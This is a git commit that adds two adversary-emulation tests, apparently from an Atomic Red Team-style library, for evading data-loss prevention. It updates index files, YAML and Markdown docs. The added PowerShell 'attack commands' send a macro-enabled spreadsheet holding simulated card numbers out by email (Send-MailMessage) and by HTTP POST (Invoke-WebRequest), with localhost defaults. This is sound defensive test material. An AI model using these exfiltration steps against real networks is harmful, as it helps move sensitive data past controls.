Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

2021-05-24 21:17:52 +00:00
parent f4a410e08e
commit f66d530189
6 changed files with 130 additions and 0 deletions
@@ -377,6 +377,8 @@ defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
 defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
+defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -262,6 +262,8 @@ defense-evasion,T1070.005,Network Share Connection Removal,3,Remove Network Shar
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
 defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
+defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
+defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -661,6 +661,8 @@
  - Atomic Test #2: Execute base64-encoded PowerShell [windows]
  - Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
  - Atomic Test #4: Execution from Compressed File [windows]
+  - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
+  - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -479,6 +479,8 @@
  - Atomic Test #2: Execute base64-encoded PowerShell [windows]
  - Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
  - Atomic Test #4: Execution from Compressed File [windows]
+  - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
+  - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -28672,6 +28672,60 @@ defense-evasion:
          rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
          del /Q "%temp%\T1027.zip" >nul 2>nul
        name: command_prompt
+    - name: DLP Evasion via Sensitive Data in VBA Macro over email
+      auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
+      description: |
+        Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
+        Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+      supported_platforms:
+      - windows
+      input_arguments:
+        input_file:
+          description: Path of the XLSM file
+          type: path
+          default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+        sender:
+          description: sender email
+          type: string
+          default: test@corp.com
+        receiver:
+          description: receiver email
+          type: string
+          default: test@corp.com
+        smtp_server:
+          description: SMTP Server IP Address
+          type: string
+          default: 127.0.0.1
+      dependency_executor_name: powershell
+      executor:
+        command: '"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027
+          Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+          -SmtpServer #{smtp_server}"
+
+'
+        name: powershell
+    - name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
+      auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
+      description: |
+        Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
+        Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+      supported_platforms:
+      - windows
+      input_arguments:
+        input_file:
+          description: Path of the XLSM file
+          type: path
+          default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+        ip_address:
+          description: Destination IP address
+          type: string
+          default: 127.0.0.1
+      dependency_executor_name: powershell
+      executor:
+        command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+
+'
+        name: powershell
  T1218.008:
    technique:
      id: attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071
@@ -18,6 +18,10 @@ Adversaries may also obfuscate commands executed from payloads or directly via a

 - [Atomic Test #4 - Execution from Compressed File](#atomic-test-4---execution-from-compressed-file)

+- [Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email](#atomic-test-5---dlp-evasion-via-sensitive-data-in-vba-macro-over-email)
+
+- [Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP](#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http)
+

 <br/>

@@ -174,4 +178,68 @@ Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T102



+<br/>
+<br/>
+
+## Atomic Test #5 - DLP Evasion via Sensitive Data in VBA Macro over email
+Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
+Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
+| sender | sender email | string | test@corp.com|
+| receiver | receiver email | string | test@corp.com|
+| smtp_server | SMTP Server IP Address | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+"Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1027 Atomic Test" -Attachments PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm -SmtpServer #{smtp_server}"
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - DLP Evasion via Sensitive Data in VBA Macro over HTTP
+Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
+Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| input_file | Path of the XLSM file | path | PathToAtomicsFolder&#92;T1027&#92;src&#92;T1027-cc-macro.xlsm|
+| ip_address | Destination IP address | string | 127.0.0.1|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-WebRequest -Uri #{ip_address} -Method POST -Body PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
+```
+
+
+
+
+
+
 <br/>